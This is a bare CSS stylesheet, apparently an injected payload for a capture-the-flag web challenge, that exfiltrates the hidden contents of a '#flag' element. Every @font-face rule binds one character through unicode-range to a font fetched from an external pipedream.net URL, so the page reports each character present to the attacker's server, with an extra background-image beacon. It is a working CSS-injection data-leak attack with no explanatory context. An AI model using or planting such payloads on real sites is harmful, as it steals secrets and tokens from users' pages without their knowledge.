body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W26')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w26,p98w26,p106w26,p112w26,p115w26,p121w26,p122w26,p48w26,p49w26,p52w26,p53w26,p55w26,p125w26,monospace;width:26ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W26');unicode-range:U+0061}
@font-face{font-family:p98w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W26');unicode-range:U+0062}
@font-face{font-family:p106w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W26');unicode-range:U+006A}
@font-face{font-family:p112w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W26');unicode-range:U+0070}
@font-face{font-family:p115w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W26');unicode-range:U+0073}
@font-face{font-family:p121w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W26');unicode-range:U+0079}
@font-face{font-family:p122w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W26');unicode-range:U+007A}
@font-face{font-family:p48w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W26');unicode-range:U+0030}
@font-face{font-family:p49w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W26');unicode-range:U+0031}
@font-face{font-family:p52w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W26');unicode-range:U+0034}
@font-face{font-family:p53w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W26');unicode-range:U+0035}
@font-face{font-family:p55w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W26');unicode-range:U+0037}
@font-face{font-family:p125w26;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W26');unicode-range:U+007D}